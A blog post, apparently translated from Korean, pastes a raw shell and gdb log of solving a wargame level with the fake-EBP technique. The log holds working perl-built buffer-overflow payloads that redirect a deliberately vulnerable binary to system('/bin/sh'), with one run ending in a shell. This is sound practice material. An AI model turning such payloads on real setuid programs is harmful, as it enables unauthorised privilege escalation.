
FEBP? What is that, something you eat? Apparently so.

I'll jot down the links I used to understand FEBP (I can't find some of them any more; there were a lot of really good ones but I wiped my whole search history, argh).

http://sangu1ne.tistory.com/9 <<- Sanguine's blog. The write-ups here are awesome! Not just the write-ups, the whole blog is great.

http://1tchy.tistory.com/entry/fake-ebp <<- The blog of 1tchy, the stylish hacker! The write-ups here are awesome too!

It's an honor to be living among people like these..

&&... cd80, heh, thanks thanks


I'm really tired right now, so I'm just posting the log and going to bed.. I'll clean it up tomorrow.

login: assassin

Password:

Last login: Thu Apr 24 17:43:56 from 192.168.10.1

[assassin@localhost assassin]$ bash2

[assassin@localhost assassin]$ payload= [dummyx4, system()[0x40058ae0], dummyx4, binsh[0xbffffc79], nopx24] [sfp->buffer[0xbffffc1a]] [ret->leaveret[0x80484df]]

bash: syntax error near unexpected token `system()'

[assassin@localhost assassin]$ ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x28\xfc\xff\xbf", "\xdf\x84\x04\x08"'`

AAAA@BBBBù¿@(ü ¿߄

Segmentation fault (core dumped)

[assassin@localhost assassin]$ gdb -q ./newbie_assassin

(gdb) disas main

Dump of assembler code for function main:

0x8048440 <main>:       push   %ebp

0x8048441 <main+1>:     mov    %esp,%ebp

0x8048443 <main+3>:     sub    $0x28,%esp

0x8048446 <main+6>:     cmpl   $0x1,0x8(%ebp)

0x804844a <main+10>:    jg     0x8048463 <main+35>

0x804844c <main+12>:    push   $0x8048540

0x8048451 <main+17>:    call   0x8048354 <printf>

0x8048456 <main+22>:    add    $0x4,%esp

0x8048459 <main+25>:    push   $0x0

0x804845b <main+27>:    call   0x8048364 <exit>

0x8048460 <main+32>:    add    $0x4,%esp

0x8048463 <main+35>:    mov    0xc(%ebp),%eax

0x8048466 <main+38>:    add    $0x4,%eax

0x8048469 <main+41>:    mov    (%eax),%edx

0x804846b <main+43>:    add    $0x2f,%edx

0x804846e <main+46>:    cmpb   $0xbf,(%edx)

0x8048471 <main+49>:    jne    0x8048490 <main+80>

0x8048473 <main+51>:    push   $0x804854c

0x8048478 <main+56>:    call   0x8048354 <printf>

0x804847d <main+61>:    add    $0x4,%esp

0x8048480 <main+64>:    push   $0x0

0x8048482 <main+66>:    call   0x8048364 <exit>

0x8048487 <main+71>:    add    $0x4,%esp

0x804848a <main+74>:    lea    0x0(%esi),%esi

0x8048490 <main+80>:    mov    0xc(%ebp),%eax

0x8048493 <main+83>:    add    $0x4,%eax

0x8048496 <main+86>:    mov    (%eax),%edx

0x8048498 <main+88>:    add    $0x2f,%edx

0x804849b <main+91>:    cmpb   $0x40,(%edx)

---Type <return> to continue, or q <return> to quit---

0x804849e <main+94>:    jne    0x80484b7 <main+119>

0x80484a0 <main+96>:    push   $0x8048561

0x80484a5 <main+101>:   call   0x8048354 <printf>

0x80484aa <main+106>:   add    $0x4,%esp

0x80484ad <main+109>:   push   $0x0

0x80484af <main+111>:   call   0x8048364 <exit>

0x80484b4 <main+116>:   add    $0x4,%esp

0x80484b7 <main+119>:   push   $0x30

0x80484b9 <main+121>:   mov    0xc(%ebp),%eax

0x80484bc <main+124>:   add    $0x4,%eax

0x80484bf <main+127>:   mov    (%eax),%edx

0x80484c1 <main+129>:   push   %edx

0x80484c2 <main+130>:   lea    0xffffffd8(%ebp),%eax

0x80484c5 <main+133>:   push   %eax

0x80484c6 <main+134>:   call   0x8048374 <strncpy>

0x80484cb <main+139>:   add    $0xc,%esp

0x80484ce <main+142>:   lea    0xffffffd8(%ebp),%eax

0x80484d1 <main+145>:   push   %eax

0x80484d2 <main+146>:   push   $0x804857e

0x80484d7 <main+151>:   call   0x8048354 <printf>

0x80484dc <main+156>:   add    $0x8,%esp

0x80484df <main+159>:   leave

0x80484e0 <main+160>:   ret

0x80484e1 <main+161>:   nop

0x80484e2 <main+162>:   nop

0x80484e3 <main+163>:   nop

0x80484e4 <main+164>:   nop

0x80484e5 <main+165>:   nop

0x80484e6 <main+166>:   nop

0x80484e7 <main+167>:   nop

---Type <return> to continue, or q <return> to quit---q

Quit

(gdb) b *main+160

Breakpoint 1 at 0x80484e0

(gdb) r `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x28\xfc\xff\xbf", "\xdf\x84\x04\x08"'`

Starting program: /home/assassin/./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x28\xfc\xff\xbf", "\xdf\x84\x04\x08"'`

AAAA@BBBBù¿@(ü


Breakpoint 1, 0x80484e0 in main ()

(gdb) x/wx $esp

0xbffffacc:     0x00000000

(gdb) r `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x28\xfc\xaa\xbf", "\xdf\x84\x04\x08"'`

The program being debugged has been started already.

Start it from the beginning? (y or n) y


Starting program: /home/assassin/./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x28\xfc\xaa\xbf", "\xdf\x84\x04\x08"'`

AAAA@BBBBù¿@(üª¿߄


Breakpoint 1, 0x80484e0 in main ()

(gdb) x/wx $esp

0xbffffacc:     0x080484df

(gdb) x/i 0x80484df

0x80484df <main+159>:   leave

(gdb) i r ebp

Ambiguous info command "r ebp": registers, remote-process.

(gdb) i reg ebp

ebp            0xbfaafc28       -1079313368

(gdb) set $ebp=0xbffffc28

(gdb) x/20wx 0xbffffc28

0xbffffc28:     0x6e697373      0x41414100      0x058ae041      0x42424240

0xbffffc38:     0x0fbff942      0x90909040      0x90909090      0x90909090

0xbffffc48:     0x90909090      0x90909090      0x90909090      0xaafc2890

0xbffffc58:     0x0484dfbf      0x454c0008      0x504f5353      0x7c3d4e45

0xbffffc68:     0x7273752f      0x6e69622f      0x73656c2f      0x70697073

(gdb) x/20wx 0xbffffc2a

0xbffffc2a:     0x41006e69      0xe0414141      0x4240058a      0xf9424242

0xbffffc3a:     0x90400fbf      0x90909090      0x90909090      0x90909090

0xbffffc4a:     0x90909090      0x90909090      0x28909090      0xdfbfaafc

0xbffffc5a:     0x00080484      0x5353454c      0x4e45504f      0x752f7c3d

0xbffffc6a:     0x622f7273      0x6c2f6e69      0x70737365      0x2e657069

(gdb) x/20wx 0xbffffc2b

0xbffffc2b:     0x4141006e      0x8ae04141      0x42424005      0xbff94242

0xbffffc3b:     0x9090400f      0x90909090      0x90909090      0x90909090

0xbffffc4b:     0x90909090      0x90909090      0xfc289090      0x84dfbfaa

0xbffffc5b:     0x4c000804      0x4f535345      0x3d4e4550      0x73752f7c

0xbffffc6b:     0x69622f72      0x656c2f6e      0x69707373      0x732e6570

(gdb) x/20wx 0xbffffc9

0xbffffc9:      Cannot access memory at address 0xbffffc9

(gdb) x/20wx 0xbffffc29

0xbffffc29:     0x006e6973      0x41414141      0x40058ae0      0x42424242

0xbffffc39:     0x400fbff9      0x90909090      0x90909090      0x90909090

0xbffffc49:     0x90909090      0x90909090      0x90909090      0xbfaafc28

0xbffffc59:     0x080484df      0x53454c00      0x45504f53      0x2f7c3d4e

0xbffffc69:     0x2f727375      0x2f6e6962      0x7373656c      0x65706970

(gdb) x/20wx 0xbffffc2d

0xbffffc2d:     0x41414141      0x40058ae0      0x42424242      0x400fbff9

0xbffffc3d:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffc4d:     0x90909090      0x90909090      0xbfaafc28      0x080484df

0xbffffc5d:     0x53454c00      0x45504f53      0x2f7c3d4e      0x2f727375

0xbffffc6d:     0x2f6e6962      0x7373656c      0x65706970      0x2068732e

(gdb) q

The program is running.  Exit anyway? (y or n) y

[assassin@localhost assassin]$ ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x2d\xfc\xff\xbf", "\xdf\x84\x04\x08"'`

AAAA@BBBBù¿@-ü ¿߄

Segmentation fault (core dumped)

[assassin@localhost assassin]$ gdb -c core -q

Core was generated by `./newbie_assassin AAAA@BBBBù¿@-ü ¿'.

Program terminated with signal 11, Segmentation fault.

#0  0xf9424242 in ?? ()

(gdb) q

[assassin@localhost assassin]$ ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x28\xfc\xff\xbf", "\xdf\x84\x04\x08"'`

AAAA@BBBBù¿@(ü ¿߄

Segmentation fault (core dumped)

[assassin@localhost assassin]$ gdb -c core -q

Core was generated by `                  AAAAAAAABBBBù¿@(ü ¿'.

Program terminated with signal 11, Segmentation fault.

#0  0x42424242 in ?? ()

(gdb) q

[assassin@localhost assassin]$ ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x24\xfc\xff\xbf", "\xdf\x84\x04\x08"'`

AAAA@BBBBù¿@$ü ¿߄

Segmentation fault (core dumped)

[assassin@localhost assassin]$ gdb -c core -q

Core was generated by `./newbie_assassin AAAA@BBBBù¿@$ü ¿'.

Program terminated with signal 11, Segmentation fault.

#0  0x41414141 in ?? ()

(gdb) q

[assassin@localhost assassin]$ ltrace -if ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x28\xfc\xff\xbf", "\xdf\x84\x04\x08"'`

[080483b1] __libc_start_main(0x08048440, 2, 0xbffffb24, 0x080482e4, 0x0804851c <unfinished ...>

[0804842b] __register_frame_info(0x08049590, 0x0804966c, 0xbffffae4, 0x08048309, 0x401081ec) = 0x40108d40

[080484cb] strncpy(0xbffffab0, "AAAA\340\212\005@BBBB\371\277\017@\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220"..., 48) = 0xbffffab0

[080484dc] printf("%s\n", "AAAA\340\212\005@BBBB\371\277\017@\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220"...AAAA@BBBBù¿@

(ü ¿߄

) = 50

[8ae04141] --- SIGSEGV (Segmentation fault) ---

[ffffffff] +++ killed by SIGSEGV +++

[assassin@localhost assassin]$ sltrace -if ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x2a\xfc\xff\xbf", "\xdf\x84\x04\x08"'`

bash2: sltrace: command not found

[assassin@localhost assassin]$ ltrace -if ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x2a\xfc\xff\xbf", "\xdf\x84\x04\x08"'`

[080483b1] __libc_start_main(0x08048440, 2, 0xbffffb24, 0x080482e4, 0x0804851c <unfinished ...>

[0804842b] __register_frame_info(0x08049590, 0x0804966c, 0xbffffae4, 0x08048309, 0x401081ec) = 0x40108d40

[080484cb] strncpy(0xbffffab0, "AAAA\340\212\005@BBBB\371\277\017@\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220"..., 48) = 0xbffffab0

[080484dc] printf("%s\n", "AAAA\340\212\005@BBBB\371\277\017@\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220"...AAAA@BBBBù¿@

*ü ¿߄

) = 50

[pid 4039] [40036cb5] --- SIGCHLD (Child exited) ---

[pid 4039] [42424242] --- SIGSEGV (Segmentation fault) ---

[pid 4039] [ffffffff] +++ killed by SIGSEGV +++

[assassin@localhost assassin]$ strace -if ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x2a\xfc\xff\xbf", "\xdf\x84\x04\x08"'`

upeek: ptrace(PTRACE_PEEKUSER, ... ): No such process

[????????] execve("./newbie_assassin", ["./newbie_assassin", "AAAA@BBBBù¿@*ü ¿"], [/* 22 vars */]) = 0

[4000f78c] brk(0)                       = 0x8049684

[4000f84d] old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40014000

[4000ee54] open("/etc/ld.so.preload", O_RDONLY) = -1 ENOENT (No such file or directory)

[4000ee54] open("/etc/ld.so.cache", O_RDONLY) = 3

[4000ed5d] fstat(3, {st_mode=S_IFREG|0644, st_size=12210, ...}) = 0

[4000f84d] old_mmap(NULL, 12210, PROT_READ, MAP_PRIVATE, 3, 0) = 0x40015000

[4000ee8d] close(3)                     = 0

[4000ee54] open("/lib/libc.so.6", O_RDONLY) = 3

[4000ed5d] fstat(3, {st_mode=S_IFREG|0755, st_size=4101324, ...}) = 0

[4000eed4] read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\210\212"..., 4096) = 4096

[4000f84d] old_mmap(NULL, 1001564, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0x40018000

[4000f8d4] mprotect(0x40105000, 30812, PROT_NONE) = 0

[4000f84d] old_mmap(0x40105000, 16384, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3, 0xec000) = 0x40105000

[4000f84d] old_mmap(0x40109000, 14428, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x40109000

[4000ee8d] close(3)                     = 0

[4000f8d4] mprotect(0x40018000, 970752, PROT_READ|PROT_WRITE) = 0

[4000f8d4] mprotect(0x40018000, 970752, PROT_READ|PROT_EXEC) = 0

[4000f891] munmap(0x40015000, 12210)    = 0

[400ca7fd] personality(PER_LINUX)       = 0

[400aa257] getpid()                     = 4043

[400bdc8c] fstat64(0x1, 0xbffff2f8)     = -1 ENOSYS (Function not implemented)

[400bdcd3] fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0

[400c7afd] old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40015000

[400c4b54] ioctl(1, TCGETS, {B9600 opost isig icanon echo ...}) = 0

[400beb14] write(1, "AAAA\340\212\5@BBBB\371\277\17@\220\220\220\220\220\220"..., 50AAAA@BBBBù¿@*ü ¿߄

) = 50

[40036ae2] rt_sigaction(SIGINT, {SIG_IGN}, {SIG_DFL}, 8) = 0

[40036ae2] rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0

[40036cb5] rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

[400a9cc8] vfork()                      = 4044

[400a98e9] wait4(4044, [WIFEXITED(s) && WEXITSTATUS(s) == 127], 0, NULL) = 4044

[40036ae2] rt_sigaction(SIGINT, {SIG_DFL}, NULL, 8) = 0

[40036ae2] rt_sigaction(SIGQUIT, {SIG_DFL}, NULL, 8) = 0

[40036cb5] rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

[40036cb5] --- SIGCHLD (Child exited) ---

[42424242] --- SIGSEGV (Segmentation fault) ---

upeek: ptrace(PTRACE_PEEKUSER, ... ): No such process

[????????] +++ killed by SIGSEGV +++

[assassin@localhost assassin]$ strace -if ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x2a\xfc\xff\xbf", "AAAA", "\xdf\x84\x04\x08"'`

upeek: ptrace(PTRACE_PEEKUSER, ... ): No such process

[????????] execve("./newbie_assassin", ["./newbie_assassin", "AAAA@BBBBù¿@*ü ¿AAAA"], [/* 22 vars */]) = 0

[4000f78c] brk(0)                       = 0x8049684

[4000f84d] old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40014000

[4000ee54] open("/etc/ld.so.preload", O_RDONLY) = -1 ENOENT (No such file or directory)

[4000ee54] open("/etc/ld.so.cache", O_RDONLY) = 3

[4000ed5d] fstat(3, {st_mode=S_IFREG|0644, st_size=12210, ...}) = 0

[4000f84d] old_mmap(NULL, 12210, PROT_READ, MAP_PRIVATE, 3, 0) = 0x40015000

[4000ee8d] close(3)                     = 0

[4000ee54] open("/lib/libc.so.6", O_RDONLY) = 3

[4000ed5d] fstat(3, {st_mode=S_IFREG|0755, st_size=4101324, ...}) = 0

[4000eed4] read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\210\212"..., 4096) = 4096

[4000f84d] old_mmap(NULL, 1001564, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0x40018000

[4000f8d4] mprotect(0x40105000, 30812, PROT_NONE) = 0

[4000f84d] old_mmap(0x40105000, 16384, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3, 0xec000) = 0x40105000

[4000f84d] old_mmap(0x40109000, 14428, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x40109000

[4000ee8d] close(3)                     = 0

[4000f8d4] mprotect(0x40018000, 970752, PROT_READ|PROT_WRITE) = 0

[4000f8d4] mprotect(0x40018000, 970752, PROT_READ|PROT_EXEC) = 0

[4000f891] munmap(0x40015000, 12210)    = 0

[400ca7fd] personality(PER_LINUX)       = 0

[400aa257] getpid()                     = 4047

[400bdc8c] fstat64(0x1, 0xbffff2e8)     = -1 ENOSYS (Function not implemented)

[400bdcd3] fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0

[400c7afd] old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40015000

[400c4b54] ioctl(1, TCGETS, {B9600 opost isig icanon echo ...}) = 0

[400beb14] write(1, "AAAA\340\212\5@BBBB\371\277\17@\220\220\220\220\220\220"..., 50AAAA@BBBBù¿@*ü ¿AAAA

) = 50

[41414141] --- SIGSEGV (Segmentation fault) ---

upeek: ptrace(PTRACE_PEEKUSER, ... ): No such process

[????????] +++ killed by SIGSEGV +++

[assassin@localhost assassin]$ gdb -c core -q

Core was generated by `./newbie_assassin AAAA@BBBBù¿@*ü ¿AAAA'.

Program terminated with signal 11, Segmentation fault.

#0  0x41414141 in ?? ()

(gdb) x/20wx $esp-40

0xbffffaa8:     0x42424242      0x400fbff9      0x90909090      0x90909090

0xbffffab8:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffac8:     0xbffffc2a      0x41414141      0x00000002      0xbffffb14

0xbffffad8:     0xbffffb20      0x40013868      0x00000002      0x08048390

0xbffffae8:     0x00000000      0x080483b1      0x08048440      0x00000002

(gdb) x/20wx $esp-60

0xbffffa94:     0x080484dc      0x0804857e      0xbffffaa0      0x41414141

0xbffffaa4:     0x40058ae0      0x42424242      0x400fbff9      0x90909090

0xbffffab4:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffac4:     0x90909090      0xbffffc2a      0x41414141      0x00000002

0xbffffad4:     0xbffffb14      0xbffffb20      0x40013868      0x00000002

(gdb) 6q

Undefined command: "6q".  Try "help".

(gdb) q

[assassin@localhost assassin]$ strace -if ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x2a\xfc\xff\xbf", "AAAA"'`

upeek: ptrace(PTRACE_PEEKUSER, ... ): No such process

[????????] execve("./newbie_assassin", ["./newbie_assassin", "AAAA@BBBBù¿@*ü ¿AAAA"], [/* 22 vars */]) = 0

[4000f78c] brk(0)                       = 0x8049684

[4000f84d] old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40014000

[4000ee54] open("/etc/ld.so.preload", O_RDONLY) = -1 ENOENT (No such file or directory)

[4000ee54] open("/etc/ld.so.cache", O_RDONLY) = 3

[4000ed5d] fstat(3, {st_mode=S_IFREG|0644, st_size=12210, ...}) = 0

[4000f84d] old_mmap(NULL, 12210, PROT_READ, MAP_PRIVATE, 3, 0) = 0x40015000

[4000ee8d] close(3)                     = 0

[4000ee54] open("/lib/libc.so.6", O_RDONLY) = 3

[4000ed5d] fstat(3, {st_mode=S_IFREG|0755, st_size=4101324, ...}) = 0

[4000eed4] read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\210\212"..., 4096) = 4096

[4000f84d] old_mmap(NULL, 1001564, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0x40018000

[4000f8d4] mprotect(0x40105000, 30812, PROT_NONE) = 0

[4000f84d] old_mmap(0x40105000, 16384, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3, 0xec000) = 0x40105000

[4000f84d] old_mmap(0x40109000, 14428, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x40109000

[4000ee8d] close(3)                     = 0

[4000f8d4] mprotect(0x40018000, 970752, PROT_READ|PROT_WRITE) = 0

[4000f8d4] mprotect(0x40018000, 970752, PROT_READ|PROT_EXEC) = 0

[4000f891] munmap(0x40015000, 12210)    = 0

[400ca7fd] personality(PER_LINUX)       = 0

[400aa257] getpid()                     = 4051

[400bdc8c] fstat64(0x1, 0xbffff2f8)     = -1 ENOSYS (Function not implemented)

[400bdcd3] fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0

[400c7afd] old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40015000

[400c4b54] ioctl(1, TCGETS, {B9600 opost isig icanon echo ...}) = 0

[400beb14] write(1, "AAAA\340\212\5@BBBB\371\277\17@\220\220\220\220\220\220"..., 50AAAA@BBBBù¿@*ü ¿AAAA

) = 50

[41414141] --- SIGSEGV (Segmentation fault) ---

upeek: ptrace(PTRACE_PEEKUSER, ... ): No such process

[????????] +++ killed by SIGSEGV +++

[assassin@localhost assassin]$ gdb -c core -q

Core was generated by `./newbie_assassin AAAA@BBBBù¿@*ü ¿AAAA'.

Program terminated with signal 11, Segmentation fault.

#0  0x41414141 in ?? ()

(gdb) x/50wx $esp-60

0xbffffaa4:     0x080484dc      0x0804857e      0xbffffab0      0x41414141

0xbffffab4:     0x40058ae0      0x42424242      0x400fbff9      0x90909090

0xbffffac4:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffad4:     0x90909090      0xbffffc2a      0x41414141      0x00000002

0xbffffae4:     0xbffffb24      0xbffffb30      0x40013868      0x00000002

0xbffffaf4:     0x08048390      0x00000000      0x080483b1      0x08048440

0xbffffb04:     0x00000002      0xbffffb24      0x080482e4      0x0804851c

0xbffffb14:     0x4000ae60      0xbffffb1c      0x40013e90      0x00000002

0xbffffb24:     0xbffffc18      0xbffffc2a      0x00000000      0xbffffc5b

0xbffffb34:     0xbffffc6e      0xbffffc86      0xbffffca5      0xbffffcc7

0xbffffb44:     0xbffffcd5      0xbffffe98      0xbffffeb7      0xbffffed5

0xbffffb54:     0xbffffeea      0xbfffff0a      0xbfffff15      0xbfffff26

0xbffffb64:     0xbfffff2e      0xbfffff38

(gdb) q

[assassin@localhost assassin]$ ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\xb0\xfa\xff\xbf", "\xdf\x84\x04\x08"'`

AAAA@BBBBù¿@°ú ¿߄

bash$ exit

exit

Segmentation fault (core dumped)

[assassin@localhost assassin]$ ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x28\xfc\xff\xbf", "\xdf\x84\x04\x08"'`

AAAA@BBBBù¿@(ü ¿߄

Segmentation fault (core dumped)

[assassin@localhost assassin]$ gdb -c core -q

Core was generated by `                  AAAAAAAABBBBù¿@(ü ¿'.

Program terminated with signal 11, Segmentation fault.

#0  0x42424242 in ?? ()

(gdb)x/40wx $esp

0xbffffc34:     0x400fbff9      0x90909090      0x90909090      0x90909090

0xbffffc44:     0x90909090      0x90909090      0x90909090      0xbffffc28

0xbffffc54:     0x080484df      0x44575000      0x6f682f3d      0x612f656d

0xbffffc64:     0x73617373      0x006e6973      0x4f4d4552      0x4f484554

0xbffffc74:     0x313d5453      0x312e3239      0x312e3836      0x00312e30

0xbffffc84:     0x54534f48      0x454d414e      0x636f6c3d      0x6f686c61

0xbffffc94:     0x6c2e7473      0x6c61636f      0x616d6f64      0x4c006e69

0xbffffca4:     0x4f535345      0x3d4e4550      0x73752f7c      0x69622f72

0xbffffcb4:     0x656c2f6e      0x69707373      0x732e6570      0x73252068

0xbffffcc4:     0x45535500      0x73613d52      0x73736173      0x4c006e69

(gdb) x/40wx $esp-40

0xbffffc0c:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffc1c:     0x00000000      0x00000000      0x00000000      0x41414141

0xbffffc2c:     0x41414141      0x42424242      0x400fbff9      0x90909090

0xbffffc3c:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffc4c:     0x90909090      0xbffffc28      0x080484df      0x44575000

0xbffffc5c:     0x6f682f3d      0x612f656d      0x73617373      0x006e6973

0xbffffc6c:     0x4f4d4552      0x4f484554      0x313d5453      0x312e3239

0xbffffc7c:     0x312e3836      0x00312e30      0x54534f48      0x454d414e

0xbffffc8c:     0x636f6c3d      0x6f686c61      0x6c2e7473      0x6c61636f

0xbffffc9c:     0x616d6f64      0x4c006e69      0x4f535345      0x3d4e4550

(gdb) x/40wx $esp-100

0xbffffbd0:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffbe0:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffbf0:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffc00:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffc10:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffc20:     0x00000000      0x00000000      0x41414141      0x41414141

0xbffffc30:     0x42424242      0x400fbff9      0x90909090      0x90909090

0xbffffc40:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffc50:     0xbffffc28      0x080484df      0x44575000      0x6f682f3d

0xbffffc60:     0x612f656d      0x73617373      0x006e6973      0x4f4d4552

(gdb) x/40wx $esp-200

0xbffffb6c:     0x00000000      0x00000000      0x40020e90      0x00000612

0xbffffb7c:     0x40021fd0      0x4001ad70      0x400143e0      0x00000003

0xbffffb8c:     0x40014650      0x00000001      0xbffff8ac      0x00000000

0xbffffb9c:     0x4003ec68      0x00000001      0x00000000      0x00000000

0xbffffbac:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffbbc:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffbcc:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffbdc:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffbec:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffbfc:     0x00000000      0x00000000      0x00000000      0x00000000

(gdb) x/40wx $esp-2000

0xbffff464:     0x4001797a      0x08048581      0x25000000      0x00000000

0xbffff474:     0x00000001      0x00000000      0x40014353      0x000ed000

0xbffff484:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffff494:     0x00000000      0x40018000      0x0000005e      0xbfffe3fc

0xbffff4a4:     0xbfffe400      0xbfffe404      0xbfffe408      0xbfffe40c

0xbffff4b4:     0xbfffe410      0xbfffe548      0x00000000      0x00000000

0xbffff4c4:     0x00002fb2      0x00001000      0x00000018      0x535975ed

0xbffff4d4:     0x0000385c      0x400143e0      0x00000018      0x000ed9c0

0xbffff4e4:     0x00000002      0xbfffe414      0xbfffe3e4      0xbfffe45c

0xbffff4f4:     0x00001000      0xbfffe45c      0x00000003      0x000f485c

(gdb)

0xbffff504:     0xbfffe530      0xbfffe490      0x40013ed0      0x00000808

0xbffff514:     0x00000000      0x00000000      0x0000675b      0x000081a4

0xbffff524:     0x00000001      0x00000000      0x00000000      0x00000808

0xbffff534:     0x00000000      0x00000000      0x40001402      0xbffff610

0xbffff544:     0x400081e6      0x400013e1      0x400013e1      0x40013868

0xbffff554:     0x400013a5      0x20730824      0xffffffff      0xffffffcf

0xbffff564:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffff574:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffff584:     0xbffffab0      0x00000000      0xbffff614      0x40000814

0xbffff594:     0x00000052      0x00000000      0x00000000      0x00000001

(gdb) x/40wx $esp-500

0xbffffa40:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffa50:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffa60:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffa70:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffa80:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffa90:     0x00000000      0x40029b0e      0xbffff8f4      0x400081e6

0xbffffaa0:     0x40029ad5      0x40029ad5      0x40013868      0x400143e0

0xbffffab0:     0x00006805      0x00000203      0x00000203      0x00000203

0xbffffac0:     0x00000006      0x08048034      0x08048390      0xbffff87c

0xbffffad0:     0x40002179      0x00006120      0x4000220c      0x08048390

(gdb)

0xbffffae0:     0x00000000      0x00000000      0x40020e90      0x00000612

0xbffffaf0:     0x40021fd0      0x4001ad70      0x400143e0      0x00000003

0xbffffb00:     0x40014650      0x00000001      0xbffff8ac      0x00000000

0xbffffb10:     0x4003ec68      0x00000000      0x00000000      0x00000000

0xbffffb20:     0x40029b0e      0xbffff8f4      0x400081e6      0x40029ad5

0xbffffb30:     0x40029ad5      0x40013868      0x400143e0      0x00006805

